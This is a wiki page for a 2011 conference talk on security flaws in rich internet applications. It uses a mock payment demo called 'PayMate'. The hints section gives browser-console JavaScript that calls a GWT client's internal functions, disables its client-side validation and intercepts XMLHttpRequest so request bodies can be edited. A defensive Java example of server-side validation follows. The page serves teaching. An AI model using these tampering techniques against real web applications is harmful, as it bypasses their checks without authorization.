RIA Security

WARNING: This wiki page was last edited over a year ago and might be outdated.

RIA Security - Broken By Design

Abstract

Rich Internet Applications (RIA) provide desktop-like usability with a web deployment model. The benefits of this combination are obvious, and RIA is now a common choice for the presentation layer in many applications. Unfortunately, moving logic from the server to an untrusted client may open up security holes that would not be present in the page-oriented "Web 1.0" architecture.

In this presentation we will take a look at client- and server-side RIA architectures from the security angle, identify some of the most common security problems and discuss strategies for avoiding them. We'll go through some example applications implemented in both architectures and demonstrate the problems. Java-based RIA frameworks, Google Web Toolkit and Vaadin, are used in the examples, but the demonstrated principles are applicable to most other frameworks and languages as well.

Recordings

Here is an HD video recording of the presentation at JavaZone 2011.

Slides

View more presentations from jojule.

PayMate Banking Service

 

I use a simple "paypal" mockup as a demo to show different vulnerabilities. The architecture of the system is as follows:

 

Source code for the system can be downloaded from here: http://dev.vaadin.com/svn/incubator/paymate-security-demo/

The system can be accessed online here: http://jole.virtuallypreinstalled.com/paymate/ (feel free to break into it :) )

Hints

// Hint 1: the GWT-compiled client runs inside an iframe (childNodes[5] here), and
// its obfuscated functions remain callable from the browser console once found.
// Anything shipped to the client is therefore readable and callable by the user.
var gwin = document.body.childNodes[5].contentWindow;
gwin.com_paymate_gwt_client_PayMateApplication_$showErrorNotification__Lcom_paymate_gwt_client_PayMateApplication_2Ljava_lang_String_2Ljava_lang_String_2("WOW", "We made it!");

// Hint 2: client-side validation is just another function in the client, and it
// can be replaced with a no-op. Validation that only runs in the browser protects nothing.
var gwin = document.body.childNodes[5].contentWindow;
gwin.com_paymate_gwt_client_SendMoney_$validate__Lcom_paymate_gwt_client_SendMoney_2 = function() {return null};

// Hint 3: every XMLHttpRequest the client sends can be held back and edited before
// it leaves the browser, so the request body the server receives is under the user's
// control regardless of what the UI allowed. The wrapper below shows the pending
// POST data in a textarea and sends whatever the textarea contains.
var xhr = document.body.childNodes[5].contentWindow.XMLHttpRequest;
xhr.prototype.originalSend = xhr.prototype.send;
xhr.prototype.send = function(a) {

	// Overlay with the captured request body and a "Post" button.
	var panel = document.createElement("DIV");
	panel.innerHTML = "<div style='position: absolute; top: 100px; left: 100px; z-index: 10000;'>"+
					  "<textarea id='postdata' cols=80 rows=20></textarea>"+
					  "<br/><button id='postbutton'>Post</button></div>";
	document.body.appendChild(panel);
	document.getElementById('postdata').value=a;

	// On click, forward the (possibly edited) body to the original send().
	var t = this;
	document.getElementById('postbutton').addEventListener("click",function() {
		t.originalSend(document.getElementById('postdata').value);
		document.body.removeChild(panel);
	}, true);
};
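The hints above show that nothing the client does can be relied on: its validation can be replaced and its request body edited in transit. The server-side counterpart is given here as an added example, not the PayMate demo's own code (the class names, the `sessionUser` parameter and the account identifiers are hypothetical). It re-runs the same validation rules on the server and checks that the source account belongs to the user authenticated by the server-side session, so a negative amount or a foreign source account is rejected whatever the client sent. In a GWT or Vaadin application the validator class would typically be shared source compiled for both sides; the client copy gives quick feedback, the server copy is the one that counts.

```java
import java.math.BigDecimal;
import java.util.HashMap;
import java.util.Map;

/** Hypothetical server-side handling of a "send money" request. */
public class TransferServer {

    /** The request exactly as parsed from the client's POST body: untrusted input. */
    public static final class TransferRequest {
        public final String fromAccount;
        public final String toAccount;
        public final BigDecimal amount;

        public TransferRequest(String fromAccount, String toAccount, BigDecimal amount) {
            this.fromAccount = fromAccount;
            this.toAccount = toAccount;
            this.amount = amount;
        }
    }

    /** Validation rules, shared by client and server; only the server run is trusted. */
    public static final class TransferValidator {
        /** Returns null when the request is valid, otherwise an error message. */
        public static String validate(TransferRequest r) {
            if (r == null) return "missing request";
            if (r.fromAccount == null || r.toAccount == null) return "missing account";
            if (r.fromAccount.equals(r.toAccount)) return "cannot transfer to the same account";
            if (r.amount == null || r.amount.signum() <= 0) return "amount must be positive";
            if (r.amount.scale() > 2) return "amount has too many decimals";
            return null;
        }
    }

    private final Map<String, BigDecimal> balances = new HashMap<>();
    private final Map<String, String> owners = new HashMap<>();

    public void openAccount(String owner, String account, BigDecimal balance) {
        owners.put(account, owner);
        balances.put(account, balance);
    }

    public BigDecimal balanceOf(String account) {
        return balances.get(account);
    }

    /**
     * @param sessionUser user identity taken from the authenticated server-side
     *                    session, never from the request body
     * @return "ok" on success, otherwise a rejection message
     */
    public synchronized String transfer(String sessionUser, TransferRequest req) {
        // Re-run the validation rules here even though the client ran them too.
        String error = TransferValidator.validate(req);
        if (error != null) return "rejected: " + error;

        // Authorization: the source account must belong to the session user,
        // no matter which account name the client put in the request.
        if (!sessionUser.equals(owners.get(req.fromAccount))) {
            return "rejected: not the owner of the source account";
        }
        if (!balances.containsKey(req.toAccount)) return "rejected: unknown destination";

        BigDecimal from = balances.get(req.fromAccount);
        if (from.compareTo(req.amount) < 0) return "rejected: insufficient funds";

        balances.put(req.fromAccount, from.subtract(req.amount));
        balances.put(req.toAccount, balances.get(req.toAccount).add(req.amount));
        return "ok";
    }

    public static void main(String[] args) {
        // Constructed sample accounts.
        TransferServer server = new TransferServer();
        server.openAccount("alice", "ACC-1", new BigDecimal("100.00"));
        server.openAccount("bob", "ACC-2", new BigDecimal("50.00"));

        // Legitimate request from alice's session: "ok".
        System.out.println(server.transfer("alice",
                new TransferRequest("ACC-1", "ACC-2", new BigDecimal("25.00"))));
        // Negative amount that a disabled client validator would let through:
        // "rejected: amount must be positive".
        System.out.println(server.transfer("alice",
                new TransferRequest("ACC-1", "ACC-2", new BigDecimal("-25.00"))));
        // Edited request body naming bob's account as the source:
        // "rejected: not the owner of the source account".
        System.out.println(server.transfer("alice",
                new TransferRequest("ACC-2", "ACC-1", new BigDecimal("10.00"))));
        // Balances after the three requests: ACC-1=75.00, ACC-2=75.00.
        System.out.println("ACC-1=" + server.balanceOf("ACC-1")
                + " ACC-2=" + server.balanceOf("ACC-2"));
    }
}
```

The two checks that matter are the ones the client cannot influence: the validator runs again on the server, and the account being debited is compared against the session identity rather than against anything in the POST body. Everything the client-side `validate` function did is treated purely as a usability feature.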

Past Presentations
